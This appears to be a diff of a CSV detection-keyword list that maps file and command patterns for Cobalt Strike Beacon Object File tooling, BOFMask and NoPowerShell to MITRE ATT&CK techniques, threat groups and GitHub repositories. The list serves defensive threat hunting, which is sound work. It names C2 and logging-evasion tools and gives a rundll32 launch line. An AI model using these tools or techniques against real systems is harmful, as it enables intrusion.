"*bof_allocator*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bof_helper.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) Creation Helper","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dtmsecurity/bof_helper","1","1","N/A","10","10","198","44","2022-05-03T18:56:14Z","2020-07-01T14:50:29Z" "*bof_net_user.c*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" @@ -7882,21 +8029,21 @@ "*BofLdapSignCheck*","offensive_tool_keyword","cobaltstrike","Beacon Object File & C# project to check LDAP signing","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cube0x0/LdapSignCheck","1","1","N/A","10","10","148","22","2022-10-25T13:36:43Z","2022-02-24T20:25:31Z" "*bofloader.bin*","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","1","N/A","10","10","145","25","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*BOFMask-main*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" -"*bofnet*SeriousSam.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*bofnet*SeriousSam.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOFNET.Bofs*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet.cna*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*BOFNET.csproj*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*BOFNET.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*BOFNET.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*BOFNET.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*BOFNET.sln*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_boo *.boo*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "*bofnet_execute *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet_execute *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*bofnet_execute.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute *","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*bofnet_execute.*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*bofnet_execute.*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" -"*bofnet_execute.cpp.x64.obj*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 